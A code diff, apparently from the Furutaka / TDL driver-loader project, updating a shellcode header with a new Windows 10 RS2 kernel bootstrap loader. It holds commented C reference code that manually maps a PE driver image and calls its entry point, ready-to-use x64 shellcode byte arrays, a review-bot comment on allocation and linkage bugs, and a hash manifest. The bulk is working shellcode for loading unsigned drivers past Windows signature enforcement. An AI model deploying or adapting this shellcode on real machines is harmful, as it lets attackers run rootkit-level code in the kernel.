@@ -110,36 +116,148 @@ void TDLBootstrapLoader( for (pos = 0; pos < isz; pos++) ((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos]; + th = NULL; InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL); - PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL, - (PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL); + if (NT_SUCCESS(PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL, + (PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL))) + { + ZwClose(th); + } } */ -static const unsigned char TDLBootstrapLoader_code[415] = { - 0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2, - 0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF, - 0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C, - 0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, - 0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00, - 0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, - 0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, - 0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, - 0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, - 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00, +const unsigned char TDLBootstrapLoader_code[480] = { + 0x48, 0x8B, 0xC4, 0x41, 0x54, 0x48, 0x81, 0xEC, 0x90, 0x00, 0x00, 0x00, 0x48, 0x89, 0x58, 0x10, + 0x4D, 0x8B, 0xE0, 0x48, 0x89, 0x68, 0x18, 0x48, 0x8D, 0x1D, 0xE2, 0xFF, 0xFF, 0xFF, 0x4C, 0x89, + 0x68, 0xE8, 0x48, 0x81, 0xC3, 0x00, 0x03, 0x00, 0x00, 0x4C, 0x89, 0x70, 0xE0, 0x4C, 0x8B, 0xEA, + 0x4C, 0x89, 0x78, 0xD8, 0x4C, 0x8B, 0xC9, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 
0x6C, 0x53, 0x4C, + 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, 0x10, 0x00, + 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xC9, 0x48, 0x8D, 0xA8, 0x00, 0x10, 0x00, 0x00, 0x48, 0x81, + 0xE5, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, 0x86, 0xB0, + 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, 0xA1, 0x00, + 0x00, 0x00, 0x48, 0x89, 0xB4, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, 0x41, 0x8B, + 0xB6, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDD, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, 0xBC, 0x24, + 0x88, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xF9, 0x85, 0xF6, 0x74, 0x68, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43, 0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9, 0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C, 0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48, - 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0, - 0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, - 0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48, - 0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, + 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFE, 0x72, 0xA0, + 0x45, 0x33, 0xC9, 0x48, 0x8B, 0xB4, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0x88, + 0x00, 0x00, 0x00, 0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0x7C, 0x24, 0x70, 0x48, 0xC1, 0xEA, 0x03, 0x48, + 0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCD, 0x48, 0x2B, 0xDD, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x48, 0x8B, 0x04, 0x0B, 0x48, 
0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75, - 0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44, - 0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58, - 0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24, - 0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6, - 0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41, - 0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3 + 0xEF, 0x4C, 0x89, 0x4C, 0x24, 0x30, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0x4C, 0x89, 0x8C, 0x24, 0xA0, + 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x4C, 0x24, 0x48, + 0x0F, 0x57, 0xC0, 0x4C, 0x89, 0x4C, 0x24, 0x50, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0xF3, 0x0F, 0x7F, + 0x44, 0x24, 0x60, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x58, 0x00, + 0x02, 0x00, 0x00, 0x41, 0x8B, 0x46, 0x28, 0x48, 0x03, 0xC5, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, + 0x89, 0x4C, 0x24, 0x20, 0x45, 0x33, 0xC9, 0x41, 0xFF, 0xD5, 0x4C, 0x8B, 0x74, 0x24, 0x78, 0x4C, + 0x8B, 0xAC, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xAC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x48, + 0x8B, 0x9C, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x85, 0xC0, 0x78, 0x0B, 0x48, 0x8B, 0x8C, 0x24, 0xA0, + 0x00, 0x00, 0x00, 0x41, 0xFF, 0xD4, 0x48, 0x81, 0xC4, 0x90, 0x00, 0x00, 0x00, 0x41, 0x5C, 0xC3 +}; + + +/* +* TDLBootstrapLoader_w10rs2 +* +* Purpose: +* +* Main part of shellcode used to execute driver code since w10rs2. 
+* +*/ +/* +void TDLBootstrapLoader_w10rs2( + PfnExAllocatePoolWithTag ExAllocatePoolWithTag +) +{ + ULONG_PTR pos, exbuffer, + Image = ((ULONG_PTR)&TDLBootstrapLoader_w10rs2) + MAX_SHELLCODE_LENGTH; + + PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image; + PIMAGE_FILE_HEADER fileh = + (PIMAGE_FILE_HEADER)(Image + sizeof(DWORD) + dosh->e_lfanew); + + PIMAGE_OPTIONAL_HEADER popth = + (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER)); + + PfnDriverEntry DriverEntry; + + ULONG isz = popth->SizeOfImage; + + PIMAGE_BASE_RELOCATION rel; + DWORD_PTR delta; + LPWORD chains; + DWORD c, p, rsz; + + exbuffer = (ULONG_PTR)ExAllocatePoolWithTag( + NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE; + exbuffer &= ~(PAGE_SIZE - 1); + + if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) + if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) + { + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + + popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); + + rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; + delta = (DWORD_PTR)exbuffer - popth->ImageBase; + c = 0; + + while (c < rsz) { + p = sizeof(IMAGE_BASE_RELOCATION); + chains = (LPWORD)((PBYTE)rel + p); + + while (p < rel->SizeOfBlock) { + + switch (*chains >> 12) { + case IMAGE_REL_BASED_HIGHLOW: + *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta; + break; + case IMAGE_REL_BASED_DIR64: + *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; + break; + } + + chains++; + p += sizeof(WORD); + } + + c += rel->SizeOfBlock; + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); + } + } + + isz >>= 3; + for (pos = 0; pos < isz; pos++) + ((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos]; + + DriverEntry = (PfnDriverEntry)(exbuffer + popth->AddressOfEntryPoint); + DriverEntry(); +} +*/ + +static const unsigned char TDLBootstrapLoader_code_w10rs2[321] = { + 0x40, 0x53, 
0x55, 0x56, 0x48, 0x83, 0xEC, 0x20, 0x4C, 0x8B, 0xC9, 0x4C, 0x89, 0x7C, 0x24, 0x50, + 0x48, 0x8D, 0x1D, 0xE9, 0xFF, 0xFF, 0xFF, 0x33, 0xC9, 0x48, 0x81, 0xC3, 0x00, 0x03, 0x00, 0x00, + 0x41, 0xB8, 0x54, 0x64, 0x6C, 0x53, 0x48, 0x63, 0x6B, 0x3C, 0x48, 0x03, 0xEB, 0x44, 0x8B, 0x7D, + 0x50, 0x41, 0x8D, 0x97, 0x00, 0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x48, 0x8D, 0xB0, 0x00, 0x10, + 0x00, 0x00, 0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x83, 0xBD, 0x84, 0x00, 0x00, 0x00, 0x05, + 0x0F, 0x86, 0xA5, 0x00, 0x00, 0x00, 0x8B, 0x8D, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, + 0x97, 0x00, 0x00, 0x00, 0x48, 0x89, 0x7C, 0x24, 0x40, 0x4C, 0x8D, 0x04, 0x0B, 0x4C, 0x8B, 0xDE, + 0x4C, 0x89, 0x74, 0x24, 0x48, 0x4C, 0x2B, 0x5D, 0x30, 0x33, 0xFF, 0x44, 0x8B, 0xB5, 0xB4, 0x00, + 0x00, 0x00, 0x45, 0x85, 0xF6, 0x74, 0x6A, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43, + 0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9, + 0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C, + 0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, + 0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48, + 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x41, 0x3B, 0xFE, 0x72, + 0x9F, 0x48, 0x8B, 0x7C, 0x24, 0x40, 0x4C, 0x8B, 0x74, 0x24, 0x48, 0x49, 0x8B, 0xD7, 0x4C, 0x8B, + 0x7C, 0x24, 0x50, 0x48, 0xC1, 0xEA, 0x03, 0x48, 0x85, 0xD2, 0x74, 0x25, 0x48, 0x8B, 0xCE, 0x48, + 0x2B, 0xDE, 0x0F, 0x1F, 0x40, 0x00, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75, + 0xEF, 0x8B, 0x45, 0x28, 0x48, 0x03, 0xC6, 0x48, 0x83, 0xC4, 0x20, 0x5E, 0x5D, 0x5B, 0x48, 0xFF, + 0xE0 }; 
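Review bot: The new TDLBootstrapLoader_w10rs2 reference never checks the return of ExAllocatePoolWithTag: on failure `exbuffer` becomes `NULL + PAGE_SIZE` rounded down, i.e. 0x1000, and the copy loop then writes the whole image to that kernel address, so an allocation failure becomes a bugcheck instead of a clean exit (the legacy loader's allocation is above the hunk and presumably has the same shape). I would allocate into a temporary first, `PVOID pool = ExAllocatePoolWithTag(NonPagedPool, isz + PAGE_SIZE, 'SldT'); if (pool == NULL) return; exbuffer = ((ULONG_PTR)pool + PAGE_SIZE) & ~(PAGE_SIZE - 1);`, and regenerate the byte array. The hunk also drops `static` from `TDLBootstrapLoader_code` while `TDLBootstrapLoader_code_w10rs2` keeps it; in a header that turns one of them into an external definition per translation unit, so both should stay `static const`. Since the C reference is only a comment and the arrays are what actually run, a line naming the compiler and options used to produce them would let a reviewer verify that the bytes and the source still match.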
diff --git a/TDL.sha256 b/TDL.sha256 index 8a8ffcf..fd98132 100644 --- a/TDL.sha256 +++ b/TDL.sha256 
@@ -1,32 +1,32 @@ -c371453e2eb9edab0949472d14871f09a6c60e4bab647910da83943bb4d3104c *Compiled\dummy.sys -4c8d13b1693c77bc4b75ae0f6262260cbc1478f3da33d039930d265db5d7eb3e *Compiled\dummy2.sys -9c81608bea1766f195ddf49f9a07b23da96dbf17a5e2d66405492eaa3155996e *Compiled\Furutaka.exe -c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln -01662c807519eac05d7082c151be3824418ccf1716216895680fe5598093d245 *Source\DummyDrv\dummy\dummy.vcxproj +a761bbb4a1b7813132dc8d8ed526d24289dc603bc706da238e1f23d75dbd66aa *Compiled\dummy.sys +f6610691bc3b9f96dad8bfc00b3ceb939ebcb17844d1ca5ee26f8364944ca110 *Compiled\dummy2.sys +bef3056b55e2f29525817e3e44753dcf32152460028d27b28e54cce3a7d1eb0f *Compiled\Furutaka.exe +14eec2753d0e9b432c54c4a70fc59e3be75674313b6308a7a820e6682f775eb9 *Source\DummyDrv\dummy.sln +d61ebda2674d2db05a235478f89fed02c2de049b00ac5648fcebd4c4e638f71c *Source\DummyDrv\dummy\dummy.vcxproj 2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv\dummy\dummy.vcxproj.user -da9e4121c5a6970b0e10e6cca6fa6065e758f5b54b46c33ff99e7f98d98d00bc *Source\DummyDrv\dummy\main.c -c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln -2fd78ce2843d7c77b1249bb7288d87605a4b3979b150a982eae56ecbabdcfb32 *Source\DummyDrv2\dummy\dummy.vcxproj +4c86a0477e8f21e81bc6651bc06cea26241fc5b9a033e64c3cd843267fc98575 *Source\DummyDrv\dummy\main.c +14eec2753d0e9b432c54c4a70fc59e3be75674313b6308a7a820e6682f775eb9 *Source\DummyDrv2\dummy.sln +f9a718ca087a1dce71638855837c464b190b7310f8e6715fc4471ed2b85af27d *Source\DummyDrv2\dummy\dummy.vcxproj f53e8133a9d12b751445ed57f4574bbeba722d26096196f544ed1794adf699f4 *Source\DummyDrv2\dummy\dummy.vcxproj.filters d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv2\dummy\dummy.vcxproj.user 
-a23f846a6321b8e411dce50c61c5d2675ee7dc6fef0e3b69d8a671120cd27b76 *Source\DummyDrv2\dummy\main.c -cc5dab13546ffcb16e97b664783e6a9121c99f89ece7dd63300714246e9622fa *Source\DummyDrv2\dummy\main.h +1e73ce5b6b079e6986509c218ce0880536b37c505056f831989e73b835c1cbbc *Source\DummyDrv2\dummy\main.c +f0732da25aa6b0a64eb0ebfc730c0902ed6fd1cc51f43f66813adbc5283de6ec *Source\DummyDrv2\dummy\main.h 10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c e25d0088a6c73c51243aac3a21e9384b24844e54f0a093d75fbf0ef44c2ff83d *Source\Furutaka\cui.c 6f145796c9bb2bd9413fe12926436c04cc0dd596be716d7423150299b39d02a0 *Source\Furutaka\cui.h 24bd86affa81071e8e4ba82368e6004ede1c4dd5234c21098c4e7563ee25721a *Source\Furutaka\Furutaka.sln -16bd5cb1f9114683a8f5b91d8f5492319b64f5b1dd5103b56c9c29c39b06237b *Source\Furutaka\Furutaka.vcxproj +656a1ebfb8ca2b136b446d8bdeac9618d27ae1f6e06c08dee0d2fb8885b0e3a1 *Source\Furutaka\Furutaka.vcxproj b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters b4d5fe6532f439d6c1161b06dfe90a6bee063c003645204d31b678efd033ae51 *Source\Furutaka\Furutaka.vcxproj.user -1a80c208b491fcd2704761490a12067ae8aa73d8bde834a20920cbd231affaf7 *Source\Furutaka\global.h +9b9f412b442a3a328693af6f6be5bc3f00b0723e49012e6395d3d5eb9184b078 *Source\Furutaka\global.h 94cbbb81022dbd0205a3e7ede89775b43f9f45e934a3079fdb7f5217d8794fe0 *Source\Furutaka\instdrv.c 33b8666748f027ff93707e6e2a1b52303c3664399000ff18b4a8fe864b731640 *Source\Furutaka\instdrv.h -c1747f460d8e42e18f3fce8c30c51be75fe382332f586756bbb86af81e8a5a45 *Source\Furutaka\main.c +2e0ae7d721d15facb6a63af2df430ce5a1d6250fdb78fc7511e24c23a2d73a9a *Source\Furutaka\main.c 8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h -2dad59a7d37bfc28fc1e0f3599584454084e5837649facde829373f41b86e08f *Source\Furutaka\resource.rc 
-f8cafd307ba14b60970fe8caf73fbb2f178d3877a3d8b51f507b431e3bf5506e *Source\Furutaka\shellcode.h +2ae545acec81745467b20da56f88a31df07de2021456d82dc16dbbe9ce0b3103 *Source\Furutaka\resource.rc +6f8ae02b3a6da025d5f918080e70245760d472dd5eb23fcc3964d425bee41336 *Source\Furutaka\shellcode.h fd0fc26c051a852fe3eaf9cb44615543b92e642274fc1eb58b53f23457fd4e89 *Source\Furutaka\sup.c 059014233efa8963d28b21f77aa37ae1c0ed3e152a9737ae8ec45338dee1d860 *Source\Furutaka\sup.h 12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h